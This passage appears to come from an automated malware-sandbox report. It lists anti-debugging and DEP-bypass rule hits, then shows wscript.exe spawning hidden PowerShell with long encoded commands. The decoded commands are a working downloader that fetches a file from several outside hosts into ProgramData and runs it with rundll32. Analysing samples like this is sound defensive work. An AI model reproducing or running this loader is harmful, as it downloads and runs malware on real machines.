ACkAKQA7AGkAdwByACAAJABQAGkAbwBuAGUAZAAgAC0ATwAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAHYAYQB0AGYAdQBsAFMAeQBzAHQAZQBtAGkAcwBlAHIALgB1AHAAZwBpAHIAZABzAEIAYQBjAGsAbABpAHMAdABzADsAJABmAGEAcwB0AHUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQARQBBAE0AQQBBAHUAQQBEAGMAQQBPAFEAQQB1AEEARABJAEEATQBBAEEAeABBAEMANABBAE4AUQBBADAAQQBBAD0APQAiADsAJABuAG8AbgB2AGEAYwB1AG8AdQBzAG4AZQBzAHMAVAB1AGMAdQBuAGEAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFkAQQBOAFEAQQB1AEEARABrAEEATQBBAEEAdQBBAEQARQBBAE8AQQBBAHoAQQBDADQAQQBNAFEAQQAxAEEARABnAEEAZAB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE0AQQBBAHUAQQBEAEkAQQBOAEEAQQAzAEEAQwA0AEEATQBRAEEAMwBBAEQAQQBBAEwAZwBBAHkAQQBEAEEAQQBOAHcAQQA9AGQAdgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFkAQQBaAFEAQgBzAEEARwA4AEEAZABRAEIAeQBBAEYAUQBBAGEAUQBCAG0AQQBHAFkAQQBaAFEAQgBrAEEAQwA0AEEAZABBAEIAdgBBAEEAPQA9ACIAOwAkAHQAdQByAHAAZQBuAHQAaQBuAGkAYwBBAG4AdABpAG0AbwBuAGEAcgBjAGgAYQBsACAAPQAgACIAQgByAGkAZABhAGwAZQByACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAdgBhAHQAZgB1AGwAUwB5AHMAdABlAG0AaQBzAGUAcgAuAHUAcABnAGkAcgBkAHMAQgBhAGMAawBsAGkAcwB0AHMAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADYANgA1ADIAMwApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBCAEUAQQBHAEUAQQBkAEEAQgBoAEEARgB3AEEAZABnAEIAaABBAEgAUQBBAFoAZwBCADEAQQBHAHcAQQBVAHcAQgA1AEEASABNAEEAZABBAEIAbABBAEcAMABBAGEAUQBCAHoAQQBHAFUAQQBjAGcAQQB1AEEASABVAEEAYwBBAEIAbgBBAEcAawBBAGMAZwBCAGsAQQBIAE0AQQBRAGcAQgBoAEEARwBNAEEAYQB3AEIAcwBBAEcAawBBAGMAdwBCADAAQQBIAE0AQQBMAEEAQgBFAEEARwB3AEEAYgBBAEIAUwBBAEcAVQBBAFoAdwBCAHAAQQBIAE0AQQBkAEEAQgBsAEEASABJAEEAVQB3AEIAbABBAEgASQBBAGQAZwBCAGwAQQBIAEkAQQBPAHcAQgBCAEEARwA0AEEAWgB3AEIAMQBBAEcAdwBBAFkAUQBCAHkAQQBBAD0APQAiADsAJABpAG0AcABlAHIAZgBvAHIAYQB0AGUAZABSAGUAcABlAG4AdABlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEYAQQBIAEUAQQBkAFEAQgBwAEEARwBjAEEAYwBnAEIAaABBAEcANABBAGQAUQBCAHMAQQBHAEUAQQBjAGcAQQB1AEEASABBAEEAYgB3AEIAcgBBAEcAVQBBAGMAZwBBAD0ATQBvAGUAdgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGMAQQBOAGcAQQB1AEEARABFAEEATgB3AEEAMABBAEMANABBAE0AUQBBAHkAQQBEAE0AQQBMAGcAQQB4AEEARABVAEEATQB3AEEAPQBNAG8AZQB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAcwBBAGEAUQBCADAAQQBHAFUAQQBaAGcAQgBzAEEASABrAEEAYQBRAEIAdQBBAEcAYwBBAEwAZwBCAG4AQQBIAEkAQQBNAG8AZQB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAFkAUQBCAHcAQQBHAFUAQQBjAGcAQgBpAEEARwA4AEEAZQBRAEIAUQBBAEgASQBBAFoAUQBCAHoAQQBIAEEAQQBiAHcAQgB1AEEASABRAEEAWQBRAEIAdQBBAEcAVQBBAGIAdwBCADEAQQBIAE0AQQBiAEEAQgA1AEEAQwA0AEEAWQB3AEIAcwBBAEcAOABBAGQAUQBCAGsAQQBBAD0APQAiADsAJABBAGQAcgBvAGkAdABlAHMAdAAgAD0AIAA0ADQAOwBiAHIAZQBhAGsAOwBBAG4AZwB1AGwAYQByADsAfQBBAG4AZwB1AGwAYQByADsAfQAgAGMAYQB0AGMAaAAgAHsAJABSAGUAdgBlAHIAdABlAHIAQgBhAG4AawBhAGIAbABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA1AEEARABNAEEATABnAEEAeABBAEQAYwBBAE4AZwBBAHUAQQBEAEkAQQBNAHcAQQB6AEEAQwA0AEEATQBnAEEAMQBBAEQASQBBAFoAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABJAEEATQBBAEEAdQBBAEQASQBBAE0AdwBBAHoAQQBDADQAQQBNAFEAQQAwAEEARABFAEEATABnAEEAeQBBAEQARQBBAE4AdwBBAD0AIgA7ACQAUwB0AHUAZABmAGkAcwBoAGUAcwBDAGUAcgBpAGEAbABpAGEAIAA9ACAAIgBwAHIAZQBwAG8AbgBkAGUAcgBhAHQAZQAiADsAfQB9ACQAYwBoAG8AbgBkAHIAZQBjAHQAbwBtAHkAIAA9ACAANwA0ADgAOwBBAG4AZwB1AGwAYQByADsA" |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
parent_process | wscript.exe | martian_process | powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABmAGwAYQBtAGwAZQBzAHMAIAA9ACAANQA0ADkAOwAkAGcAYQBzAHQAZQByAG8AegBvAG8AaQBkAFYAaQBuAGQAaQBjAGEAdABvAHIAIAA9ACAAIgBBAG0AcAB1AHQAYQB0AGUAZABKAGUAZABjAG8AYwBrACIAOwAkAFQAZQBsAGUAcwBjAG8AcABpAGMAYQBsACAAPQAgACIAUAByAGUAbABhAHQAaQBjAGEAbABuAGUAcwBzAEMAYQBuAGMAZQBsACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADsAJABTAHQAcgBhAGkAdABzAG0AZQBuAFIAaABvAG0AYgBvAGgAZQBkAHIAYQBsACAAPQAgADIAMAA2ADsAJABNAG8AcwBrAGUAbgBlAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE8AQQBBAHUAQQBEAEkAQQBOAFEAQQAxAEEAQwA0AEEATQBnAEEAeABBAEQATQBBAEwAZwBBAHgAQQBEAGcAQQBNAFEAQQB2AEEARwAwAEEAYQBRAEIAUwBBAEMAOABBAFkAdwBCAHEAQQBHAGsAQQBUAEEAQgBRAEEASABBAEEAUwBRAEIAVQBBAEEAPQA9AHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABRAEEATwBRAEEAdQBBAEQARQBBAE4AUQBBADAAQQBDADQAQQBNAFEAQQAxAEEARABnAEEATABnAEEANQBBAEQARQBBAEwAdwBCAFkAQQBHADQAQQBaAEEAQQB2AEEARgBjAEEAYgB3AEIAdgBBAEUATQBBAGEAZwBCADEAQQBIAG8AQQBTAFEAQgBDAEEARQBRAEEAdQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAEkAQQBMAGcAQQAxAEEARABRAEEATAB3AEEANQBBAEUAYwBBAFUAUQBBADEAQQBFAEUAQQBPAEEAQQB2AEEARQA4AEEAVABnAEIAUABBAEUAcwBBAGUAUQBCAHQAQQBIAGcAQQBiAHcAQgB2AEEARwA0AEEAUgBnAEEAPQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABzAGwAdQBnAGwAaQBrAGUAIABpAG4AIAAkAE0AbwBzAGsAZQBuAGUAZQByACAALQBzAHAAbABpAHQAIAAiAHUAIgApACAAewAkAEQAaQBzAHMAZQB2AGUAcgBzACAAPQAgADYANgAwADsAdAByAHkAIAB7ACQAVwBhAGIAcgBvAG4AVwBvAG8AaQBuAGcAIAA9ACAAIgBNAGkAcwBsAGkAdgBlAGQARABpAHAAbABvAGsAYQByAHkAbwBuACIAOwAkAG8AdQB0AHQAaABvAHUAZwBoAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBaAEEAQgB5AEEARwA4AEEAYwB3AEIAegBBAEcAawBBAGIAZwBCAGwAQQBIAE0AQQBjAHcAQQB1AEEASABBAEEAYQBBAEIANQBBAEgATQBBAGEAUQBCAHYAQQBBAD0APQBuAHYAcgBLAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQAVQBBAE0AdwBBAHUAQQBEAEkAQQBOAEEAQQB4AEEAQwA0AEEATQBnAEEAdwBBAEQAawBBAEwAZwBBADUAQQBEAFUAQQBuAHYAcgBLAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdgBBAEgATQBBAGQAQQBCAGwAQQBHADgAQQBjAEEAQgBzAEEARwBFAEEAYwB3AEIAMABBAEcAawBBAFoAUQBCAHoAQQBDADQAQQBkAEEAQgBoAEEASABnAEEAbgB2AHIASwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBhAEEAQgBsAEEARwBFAEEAWgBBAEIAbABBAEgASQBBAEwAZwBCAGkAQQBHAFUAQQBaAFEAQgB5AEEAQQA9AD0AIgA7ACQAQwBoAG8AbgBkAHIAbwBjAGwAYQBzAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAE0AQQBHAGsAQQBjAEEAQgB2AEEARwB3AEEAZQBRAEIAegBBAEcAVQBBAGMAdwBBAHUAQQBHAE0AQQBhAFEAQgAwAEEASABrAEEAIgA7ACQAUABpAG8AbgBlAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcwBsAHUAZwBsAGkAawBlACkAKQA7AGkAdwByACAAJABQAGkAbwBuAGUAZAAgAC0ATwAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAHYAYQB0AGYAdQBsAFMAeQBzAHQAZQBtAGkAcwBlAHIALgB1AHAAZwBpAHIAZABzAEIAYQBjAGsAbABpAHMAdABzADsAJABmAGEAcwB0AHUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQARQBBAE0AQQBBAHUAQQBEAGMAQQBPAFEAQQB1AEEARABJAEEATQBBAEEAeABBAEMANABBAE4AUQBBADAAQQBBAD0APQAiADsAJABuAG8AbgB2AGEAYwB1AG8AdQBzAG4AZQBzAHMAVAB1AGMAdQBuAGEAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFkAQQBOAFEAQQB1AEEARABrAEEATQBBAEEAdQBBAEQARQBBAE8AQQBBAHoAQQBDADQAQQBNAFEAQQAxAEEARABnAEEAZAB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE0AQQBBAHUAQQBEAEkAQQBOAEEAQQAzAEEAQwA0AEEATQBRAEEAMwBBAEQAQQBBAEwAZwBBAHkAQQBEAEEAQQBOAHcAQQA9AGQAdgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFkAQQBaAFEAQgBzAEEARwA4AEEAZABRAEIAeQBBAEYAUQBBAGEAUQBCAG0AQQBHAFkAQQBaAFEAQgBrAEEAQwA0AEEAZABBAEIAdgBBAEEAPQA9ACIAOwAkAHQAdQByAHAAZQBuAHQAaQBuAGkAYwBBAG4AdABpAG0AbwBuAGEAcgBjAGgAYQBsACAAPQAgACIAQgByAGkAZABhAGwAZQByACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAdgBhAHQAZgB1AGwAUwB5AHMAdABlAG0AaQBzAGUAcgAuAHUAcABnAGkAcgBkAHMAQgBhAGMAawBsAGkAcwB0AHMAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADYANgA1ADIAMwApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBCAEUAQQBHAEUAQQBkAEEAQgBoAEEARgB3AEEAZABnAEIAaABBAEgAUQBBAFoAZwBCADEAQQBHAHcAQQBVAHcAQgA1AEEASABNAEEAZABBAEIAbABBAEcAMABBAGEAUQBCAHoAQQBHAFUAQQBjAGcAQQB1AEEASABVAEEAYwBBAEIAbgBBAEcAawBBAGMAZwBCAGsAQQBIAE0AQQBRAGcAQgBoAEEARwBNAEEAYQB3AEIAcwBBAEcAawBBAGMAdwBCADAAQQBIAE0AQQBMAEEAQgBFAEEARwB3AEEAYgBBAEIAUwBBAEcAVQBBAFoAdwBCAHAAQQBIAE0AQQBkAEEAQgBsAEEASABJAEEAVQB3AEIAbABBAEgASQBBAGQAZwBCAGwAQQBIAEkAQQBPAHcAQgBCAEEARwA0AEEAWgB3AEIAMQBBAEcAdwBBAFkAUQBCAHkAQQBBAD0APQAiADsAJABpAG0AcABlAHIAZgBvAHIAYQB0AGUAZABSAGUAcABlAG4AdABlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEYAQQBIAEUAQQBkAFEAQgBwAEEARwBjAEEAYwBnAEIAaABBAEcANABBAGQAUQBCAHMAQQBHAEUAQQBjAGcAQQB1AEEASABBAEEAYgB3AEIAcgBBAEcAVQBBAGMAZwBBAD0ATQBvAGUAdgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGMAQQBOAGcAQQB1AEEARABFAEEATgB3AEEAMABBAEMANABBAE0AUQBBAHkAQQBEAE0AQQBMAGcAQQB4AEEARABVAEEATQB3AEEAPQBNAG8AZQB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAcwBBAGEAUQBCADAAQQBHAFUAQQBaAGcAQgBzAEEASABrAEEAYQBRAEIAdQBBAEcAYwBBAEwAZwBCAG4AQQBIAEkAQQBNAG8AZQB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAFkAUQBCAHcAQQBHAFUAQQBjAGcAQgBpAEEARwA4AEEAZQBRAEIAUQBBAEgASQBBAFoAUQBCAHoAQQBIAEEAQQBiAHcAQgB1AEEASABRAEEAWQBRAEIAdQBBAEcAVQBBAGIAdwBCADEAQQBIAE0AQQBiAEEAQgA1AEEAQwA0AEEAWQB3AEIAcwBBAEcAOABBAGQAUQBCAGsAQQBBAD0APQAiADsAJABBAGQAcgBvAGkAdABlAHMAdAAgAD0AIAA0ADQAOwBiAHIAZQBhAGsAOwBBAG4AZwB1AGwAYQByADsAfQBBAG4AZwB1AGwAYQByADsAfQAgAGMAYQB0AGMAaAAgAHsAJABSAGUAdgBlAHIAdABlAHIAQgBhAG4AawBhAGIAbABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA1AEEARABNAEEATABnAEEAeABBAEQAYwBBAE4AZwBBAHUAQQBEAEkAQQBNAHcAQQB6AEEAQwA0AEEATQBnAEEAMQBBAEQASQBBAFoAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABJAEEATQBBAEEAdQBBAEQASQBBAE0AdwBBAHoAQQBDADQAQQBNAFEAQQAwAEEARABFAEEATABnAEEAeQBBAEQARQBBAE4AdwBBAD0AIgA7ACQAUwB0AHUAZABmAGkAcwBoAGUAcwBDAGUAcgBpAGEAbABpAGEAIAA9ACAAIgBwAHIAZQBwAG8AbgBkAGUAcgBhAHQAZQAiADsAfQB9ACQAYwBoAG8AbgBkAHIAZQBjAHQAbwBtAHkAIAA9ACAANwA0ADgAOwBBAG4AZwB1AGwAYQByADsA" | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABmAGwAYQBtAGwAZQBzAHMAIAA9ACAANQA0ADkAOwAkAGcAYQBzAHQAZQByAG8AegBvAG8AaQBkAFYAaQBuAGQAaQBjAGEAdABvAHIAIAA9ACAAIgBBAG0AcAB1AHQAYQB0AGUAZABKAGUAZABjAG8AYwBrACIAOwAkAFQAZQBsAGUAcwBjAG8AcABpAGMAYQBsACAAPQAgACIAUAByAGUAbABhAHQAaQBjAGEAbABuAGUAcwBzAEMAYQBuAGMAZQBsACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADsAJABTAHQAcgBhAGkAdABzAG0AZQBuAFIAaABvAG0AYgBvAGgAZQBkAHIAYQBsACAAPQAgADIAMAA2ADsAJABNAG8AcwBrAGUAbgBlAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE8AQQBBAHUAQQBEAEkAQQBOAFEAQQAxAEEAQwA0AEEATQBnAEEAeABBAEQATQBBAEwAZwBBAHgAQQBEAGcAQQBNAFEAQQB2AEEARwAwAEEAYQBRAEIAUwBBAEMAOABBAFkAdwBCAHEAQQBHAGsAQQBUAEEAQgBRAEEASABBAEEAUwBRAEIAVQBBAEEAPQA9AHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABRAEEATwBRAEEAdQBBAEQARQBBAE4AUQBBADAAQQBDADQAQQBNAFEAQQAxAEEARABnAEEATABnAEEANQBBAEQARQBBAEwAdwBCAFkAQQBHADQAQQBaAEEAQQB2AEEARgBjAEEAYgB3AEIAdgBBAEUATQBBAGEAZwBCADEAQQBIAG8AQQBTAFEAQgBDAEEARQBRAEEAdQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAEkAQQBMAGcAQQAxAEEARABRAEEATAB3AEEANQBBAEUAYwBBAFUAUQBBADEAQQBFAEUAQQBPAEEAQQB2AEEARQA4AEEAVABnAEIAUABBAEUAcwBBAGUAUQBCAHQAQQBIAGcAQQBiAHcAQgB2AEEARwA0AEEAUgBnAEEAPQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABzAGwAdQBnAGwAaQBrAGUAIABpAG4AIAAkAE0AbwBzAGsAZQBuAGUAZQByACAALQBzAHAAbABpAHQAIAAiAHUAIgApACAAewAkAEQAaQBzAHMAZQB2AGUAcgBzACAAPQAgADYANgAwADsAdAByAHkAIAB7ACQAVwBhAGIAcgBvAG4AVwBvAG8AaQBuAGcAIAA9ACAAIgBNAGkAcwBsAGkAdgBlAGQARABpAHAAbABvAGsAYQByAHkAbwBuACIAOwAkAG8AdQB0AHQAaABvAHUAZwBoAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBaAEEAQgB5AEEARwA4AEEAYwB3AEIAegBBAEcAawBBAGIAZwBCAGwAQQBIAE0AQQBjAHcAQQB1AEEASABBAEEAYQBBAEIANQBBAEgATQBBAGEAUQBCAHYAQQBBAD0APQBuAHYAcgBLAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQAVQBBAE0AdwBBAHUAQQBEAEkAQQBOAEEAQQB4AEEAQwA0AEEATQBnAEEAdwBBAEQAawBBAEwAZwBBADUAQQBEAFUAQQBuAHYAcgBLAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdgBBAEgATQBBAGQAQQBCAGwAQQBHADgAQQBjAEEAQgBzAEEARwBFAEEAYwB3AEIAMABBAEcAawBBAFoAUQBCAHoAQQBDADQAQQBkAEEAQgBoAEEASABnAEEAbgB2AHIASwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBhAEEAQgBsAEEARwBFAEEAWgBBAEIAbABBAEgASQBBAEwAZwBCAGkAQQBHAFUAQQBaAFEAQgB5AEEAQQA9AD0AIgA7ACQAQwBoAG8AbgBkAHIAbwBjAGwAYQBzAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAE0AQQBHAGsAQQBjAEEAQgB2AEEARwB3AEEAZQBRAEIAegBBAEcAVQBBAGMAdwBBAHUAQQBHAE0AQQBhAFEAQgAwAEEASABrAEEAIgA7ACQAUABpAG8AbgBlAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcwBsAHUAZwBsAGkAawBlACkAKQA7AGkAdwByACAAJABQAGkAbwBuAGUAZAAgAC0ATwAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAHYAYQB0AGYAdQBsAFMAeQBzAHQAZQBtAGkAcwBlAHIALgB1AHAAZwBpAHIAZABzAEIAYQBjAGsAbABpAHMAdABzADsAJABmAGEAcwB0AHUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQARQBBAE0AQQBBAHUAQQBEAGMAQQBPAFEAQQB1AEEARABJAEEATQBBAEEAeABBAEMANABBAE4AUQBBADAAQQBBAD0APQAiADsAJABuAG8AbgB2AGEAYwB1AG8AdQBzAG4AZQBzAHMAVAB1AGMAdQBuAGEAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFkAQQBOAFEAQQB1AEEARABrAEEATQBBAEEAdQBBAEQARQBBAE8AQQBBAHoAQQBDADQAQQBNAFEAQQAxAEEARABnAEEAZAB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE0AQQBBAHUAQQBEAEkAQQBOAEEAQQAzAEEAQwA0AEEATQBRAEEAMwBBAEQAQQBBAEwAZwBBAHkAQQBEAEEAQQBOAHcAQQA9AGQAdgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFkAQQBaAFEAQgBzAEEARwA4AEEAZABRAEIAeQBBAEYAUQBBAGEAUQBCAG0AQQBHAFkAQQBaAFEAQgBrAEEAQwA0AEEAZABBAEIAdgBBAEEAPQA9ACIAOwAkAHQAdQByAHAAZQBuAHQAaQBuAGkAYwBBAG4AdABpAG0AbwBuAGEAcgBjAGgAYQBsACAAPQAgACIAQgByAGkAZABhAGwAZQByACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAdgBhAHQAZgB1AGwAUwB5AHMAdABlAG0AaQBzAGUAcgAuAHUAcABnAGkAcgBkAHMAQgBhAGMAawBsAGkAcwB0AHMAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADYANgA1ADIAMwApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBCAEUAQQBHAEUAQQBkAEEAQgBoAEEARgB3AEEAZABnAEIAaABBAEgAUQBBAFoAZwBCADEAQQBHAHcAQQBVAHcAQgA1AEEASABNAEEAZABBAEIAbABBAEcAMABBAGEAUQBCAHoAQQBHAFUAQQBjAGcAQQB1AEEASABVAEEAYwBBAEIAbgBBAEcAawBBAGMAZwBCAGsAQQBIAE0AQQBRAGcAQgBoAEEARwBNAEEAYQB3AEIAcwBBAEcAawBBAGMAdwBCADAAQQBIAE0AQQBMAEEAQgBFAEEARwB3AEEAYgBBAEIAUwBBAEcAVQBBAFoAdwBCAHAAQQBIAE0AQQBkAEEAQgBsAEEASABJAEEAVQB3AEIAbABBAEgASQBBAGQAZwBCAGwAQQBIAEkAQQBPAHcAQgBCAEEARwA0AEEAWgB3AEIAMQBBAEcAdwBBAFkAUQBCAHkAQQBBAD0APQAiADsAJABpAG0AcABlAHIAZgBvAHIAYQB0AGUAZABSAGUAcABlAG4AdABlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEYAQQBIAEUAQQBkAFEAQgBwAEEARwBjAEEAYwBnAEIAaABBAEcANABBAGQAUQBCAHMAQQBHAEUAQQBjAGcAQQB1AEEASABBAEEAYgB3AEIAcgBBAEcAVQBBAGMAZwBBAD0ATQBvAGUAdgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGMAQQBOAGcAQQB1AEEARABFAEEATgB3AEEAMABBAEMANABBAE0AUQBBAHkAQQBEAE0AQQBMAGcAQQB4AEEARABVAEEATQB3AEEAPQBNAG8AZQB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAcwBBAGEAUQBCADAAQQBHAFUAQQBaAGcAQgBzAEEASABrAEEAYQBRAEIAdQBBAEcAYwBBAEwAZwBCAG4AQQBIAEkAQQBNAG8AZQB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAFkAUQBCAHcAQQBHAFUAQQBjAGcAQgBpAEEARwA4AEEAZQBRAEIAUQBBAEgASQBB